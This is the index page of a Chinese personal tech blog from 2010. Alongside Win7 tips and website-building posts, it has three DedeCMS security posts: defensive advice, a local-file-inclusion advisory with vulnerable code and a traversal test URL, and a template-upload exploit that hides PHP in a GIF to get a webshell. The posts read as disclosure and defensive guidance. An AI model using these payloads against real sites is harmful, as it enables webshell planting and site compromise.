• Blog
  • Archives
  • Search
  • Comments
  • Tags
  • Links
  • xxshuo
  • RSS

有梦就有快乐[杨恒飞]

Reg | Login

人生旅途慢慢,但有梦就会有快乐!

Total: 415Page 1 of 701234567Next ›Last »

阅读全文

穷人和富人的经典差异
By On 2010-06-26, 5:21 PM | Category: 心情管理 | Comments: 2
Tags: 富人 , 穷人

阅读全文

关于新云采集设置中几个常见问题的说明
By coldstar On 5天前 11:59 | Category: 网站建设 | Comments: 0

关于新云采集设置中几个常见的问题

1、过滤设置是干什么的,我要过滤什么样的标签?
2、采集匹配的开始和结束代码应该怎样设置?
3、怎样采集回来的内容才不会导致页面错位?
4、分页采集怎么设置?内容分页和分页设置两个选项有什么区别?

Read more
Tags: 采集 , 新云

阅读全文

织梦(Dedecms) 漏洞频出 给使用者的一些安全建议
By coldstar On 2010-08-26, 11:23 AM | Category: 安全相关 | Comments: 1

织梦(dedecms) 漏洞频出,让一些站长惶恐,不过掌握一些基本知识可以让你在遇到这些问题时,不再那么害怕与无助。

不管是最近的用户发表文章自定义模版漏洞还是这个carbuyaction.php 本地包含文件漏洞,还是之前的什么会员中心上传发表漏洞,有没有发现他们都有一些共同点?

首先都要进入会员中心操作,再次都要先上传一个图片文件(这个所谓的图片文件是包含PHP脚本的改了后缀的伪造文件)然后再利用程序漏洞,将这些图片中包含的PHP代码转化执行,进而得到webshell,对你的站点进行挂马等操作。

了解了漏洞的执行过程,我们在防范时,就会容易得多:

1、经常查看程序官方公告,一般都会及时给出补丁程序,及时更新。

2、如果你的网站会员中心没什么用处,直接将会员模块/member/ 目录删除,利用者没有会员中心,即无从上传,可避免大部分漏洞。

3、如果你还要用会员中心,那么能不要上传的就关闭上传,尽可能减少被上传木马的风险。

如果你做了以上操作,还是中招了,学会从网站访问日志(IIS日志)中分析问题,以被上传的木马名为关键字,在日志中搜寻,一般可以得到一些信息,利用者是从哪个位置上传了木马。

希望这些简短的文字能为你加强网站安全带去一些帮助。

Tags: dedecms , 漏洞

阅读全文

织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
By coldstar On 2010-08-26, 11:10 AM | Category: 安全相关 | Comments: 0

影响版本:
dedecmsV5.6

漏洞描述:
DedeCMS内容管理系统软件采用XML名字空间风格核心模板:模板全部使用文件形式保存,对用户设计模板、网站升级转移均提供很大的便利,健壮的模板标签为站长DIY 自己的网站提供了强有力的支持。

<?php
require_once (dirname(__FILE__) . "/../include/common.inc.php");
define('_PLUS_TPL_', DEDEROOT.'/templets/plus');
require_once DEDEINC.'/dedetemplate.class.php';
require_once DEDEINC.'/shopcar.class.php';
require_once DEDEINC.'/memberlogin.class.php';

if($cfg_mb_open=='N')
{
 ShowMsg("系统关闭了会员功能,因此你无法访问此页面!","javascript:;");
  exit();
}

$cfg_ml = new MemberLogin();

if(!isset($dopost) || empty($dopost)){
 //只要$dopost不为空就行,By:俺是农村的。
 ...
}elseif($dopost == 'return'){
 require_once DEDEINC.'/payment/'.$code.'.php';  //变量$code未初始化,By:俺是农村的。
 $pay = new $code;
  $msg=$pay->respond();
 ShowMsg($msg,"javascript:;",0,3000);
  exit(); 
}
?>

参考
http://www.t00ls.net/
http://sebug.net

测试方法:
http://www.ssvdb.com/plus/carbuyaction.php?dopost=return&code=../../

安全建议:
厂商补丁:
DedeCMS
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.dedecms.com/

Tags: dedecms , 漏洞

阅读全文

利用dedecms漏洞 自定义模版oday 成功上传webshell
By coldstar On 2010-08-25, 11:44 PM | Category: 安全相关 | Comments: 0

最近不少使用dedecms的站被黑,今天被朋友查了一下,发现网上早已爆出了这个漏洞,会员投稿时提交自定义文章模版,而模版则是精心构造的一个使用图片保存的PHP代码,而进实现构造PHP程序执行。

author:toby57
team:www.wolvez.org

此0day已经出现了相当长一段时间,今天配合小龙同学提供的日志看了下代码,了解了漏洞成因。大多同学对成因不感兴趣,这儿就只公布利用方法。

Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
保存为1.gif

Read more
Tags: dedecms , 漏洞

阅读全文

关闭Win7右下角操作中心的小白旗图标
By coldstar On 2010-08-25, 1:19 PM | Category: win7 | Comments: 0

刚接触win7的朋友,对于win7操作中心的友情提示会觉得非常人性化,很友好。有什么问题,他都会给予提示,并提供解决方案。

但是时间一长,对系统熟悉了,而且当我电脑没有问题的时候,他是总是显示在那儿。看点就有点不舒服了。能不能让他别显示,没事的时候,别出来呢。

方法其实也很简单,只需三步即可搞定:

1、打开win7任务栏通知区的自定义图标功能

1.jpg

大小: 15.73 K
尺寸: 231 x 157
浏览: 0 次
点击打开新窗口浏览全图

2、点击打开或关闭系统图标

2.jpg

大小: 82.97 K
尺寸: 895 x 597
浏览: 0 次
点击打开新窗口浏览全图

3、找到小白旗图标,选择关闭即可

3.jpg

大小: 67.02 K
尺寸: 900 x 597
浏览: 2 次
点击打开新窗口浏览全图

Tags: 小白旗 , 操作中心 , win7

阅读全文

从一个美女网站看用户体验的重要性
By coldstar On 2010-08-24, 6:22 PM | Category: 网站建设 | Comments: 2

有几个网站能让你第一次访问就记得他呢?从事网络行业多年,我也是同样感觉,很少有遇到能让自己第一次看就记得的网站,除了在寻找的稀有资源。但这一次,居然在满是采集站垃圾站的美女图片站中让我遇到了一个。他的用户体验设计,让我第一次就记住了他。同时自己又觉得汗颜,朋友讲,SEO至高宝典就是做好用户体验,但我从来没有理解这句话,今天,我想我明白了。

Read more
Tags: 用户体验 , 美女网站
Total: 415Page 1 of 701234567Next ›Last »
  • View Model: Nomal | List
  • Category

    nginx (28)

    win7 (20)

    Windows (39)

    Linux (51)

    WEB服务器 (73)

    网站架构 (11)

    存储与缓存 (2)

    数据库技术 (20)

    WEB开发 (24)

    网站建设 (30)

    安全相关 (27)

    软件开发 (3)

    网络观察 (20)

    精彩瞬间 (20)

    心情管理 (49)

    个人收藏 (29)

  • Calendar

    « 2010年09月 »
    日 一 二 三 四 五 六
    1 2 3 4
    5 6 7 8 9 10 11
    12 13 14 15 16 17 18
    19 20 21 22 23 24 25
    26 27 28 29 30
  • Hot Tags

    nginx win7 iis apache linux mysql 破解 管理 mssql php access 漏洞 四博新云 seo 加速 驱动 centos w32dasm yum lvs asp mm rewrite gzip resin 优化 awk 架构 cache 创业 oracle dedecms ip_hash div+css 程序员 感谢google baidu 百度 老公 女人 shutdown 服务器 apache+tomcat 黑竹沟 小小说 tomcat pure-ftpd iis7 工作 mrtg
  • Comments

    你还弄到博客上了,哈哈!
    09-03 - mjxhehe

    我也遇到这问题,正想找人问问呢。...
    08-26 - 爽爽

    我是在工作,没看讲的是用户体验么...
    08-24 - coldstar

    --!你还有这爱好! 咋不加...
    08-24 - 商鹏龙

    这下全部明白了。
    08-16 - 化工泵

    换句话说就是,圈子决定财富
    08-02 - PHPma

    学习了,谢谢!
    07-21 - ajcheng

    不知道你这里用的什么备份工具。我...
    07-19 - apple

    牛哈~~~
    07-17 - Lanyd

    仅仅是统计流量意义不大吧,已经有...
    07-17 - Lanyd

  • FriendLinks

    99 Roses[叶涛]

    Alibaba DBA Team

    fovweb

    Franky

    MySQL 中文网

    nginx

    sclife

    SEM一家之言

    Zac 的SEO博客

    [支付宝] 冯大辉

    回忆未来[张宴]

    好朋友

    懒人运维

    田逸的博客

    简朝阳 Sky Jian

    网易高级DBA

    脸蛋网

    花的嫁纱

    西西说

    雨·漫步

    More

  • Others

    Article 415, Comment 99.

    Powered by SaBlog-X.

    Designed by Giki+Kula.

    有梦就有快乐[杨恒飞] All rights reserved.

    陕ICP备07009322号